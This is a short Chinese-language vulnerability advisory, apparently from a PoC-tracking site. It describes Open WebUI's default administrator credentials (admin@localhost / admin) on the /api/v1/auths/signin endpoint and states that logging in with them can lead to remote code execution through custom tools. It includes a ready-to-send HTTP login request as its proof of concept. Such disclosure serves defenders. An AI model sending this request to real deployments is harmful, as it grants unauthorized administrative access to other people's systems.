Open WebUI /api/v1/auths/signin 默认口令漏洞

2026-04-17 Open PoC Public

Description

Open WebUI 是一个基于大语言模型(LLM)的开放源代码 Web 用户界面,专为 AI 应用开发和部署设计。该产品提供完整的 AI 对话管理功能,包括模型管理、对话历史、API 密钥管理、用户权限控制和工具自定义等核心模块。Open WebUI 支持 OpenAI、Anthropic、Llama 等多种 LLM 模型,提供直观的聊天界面和强大的 API 集成能力,广泛应用于 AI 应用开发、智能客服、内容生成和代码辅助等场景。Open WebUI 的 /api/v1/auths/signin 接口存在默认口令漏洞,系统使用了预设的默认管理员凭证(用户名 admin@localhost,密码 admin),攻击者可直接使用这些凭据登录系统,获取管理权限,并可通过自定义工具功能实现远程代码执行。

PoC

POST /api/v1/auths/signin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Connection: close
Content-Length: 49
Content-Type: application/json
Accept-Encoding: gzip

{"email": "admin@localhost", "password": "admin"}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities